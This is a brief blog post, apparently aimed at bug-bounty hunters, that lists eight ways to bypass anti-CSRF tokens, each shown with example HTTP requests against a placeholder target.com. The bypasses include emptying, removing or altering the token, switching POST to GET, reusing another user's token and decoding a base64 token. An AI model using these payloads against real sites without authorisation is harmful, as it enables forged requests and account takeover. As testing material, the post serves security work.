Posts Csrf Tips
Post
Cancel

Csrf Tips

Posted Aug 8, 2019 2019-08-08T00:00:00+02:00 by Ahmed Salah Abdalhfaz

Click heret

title: Bypass CSRF author: Elsfa7-110 categories: [csrf, Tutorial] tags: [csrf] pin: true —

Bypass CSRF Token

  1. Change single character ``` POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa

1

Try this to bypass

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab

1
2

2. Sending empty value of token

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa

1

Try this to bypass

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=

1
2

3. Replace the token with same length

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=aaaaaa

1

Try this to bypass

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=aaabaa

1

4. Changing POST / GET method

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa

1

Try this to bypass

GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 Host: target.com […]

1
2

5. Remove the token from request

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa

1

Try this to bypass

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456

1
2

6. Use another user's valid token

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=ANOTHER_VALID_TOKEN

1
2

7. Try to decrypt hash

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=MTIzNDU2

1
2
3

MTIzNDU2 => 123456 with base64

8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=vi802jg9f8akd9j123

1

When we register again, the request like this

POST /register HTTP/1.1 Host: target.com […]

username=dapos&password=123456&token=vi802jg9f8akd9j124 ``` If you notice “vi802jg9f8akd9j” part of the token remain same, you just need to send with only static part

This post is licensed under CC BY 4.0 by the author.
Contents

Accounttakeover Tips

Idor Tips

Trending Tags